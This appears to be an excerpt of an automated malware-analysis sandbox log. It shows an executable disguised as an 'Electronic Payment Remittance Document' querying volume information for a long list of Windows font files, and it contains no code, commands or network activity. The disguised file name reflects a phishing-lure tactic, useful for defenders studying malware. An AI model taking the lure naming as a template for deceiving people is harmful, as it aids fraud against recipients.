          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
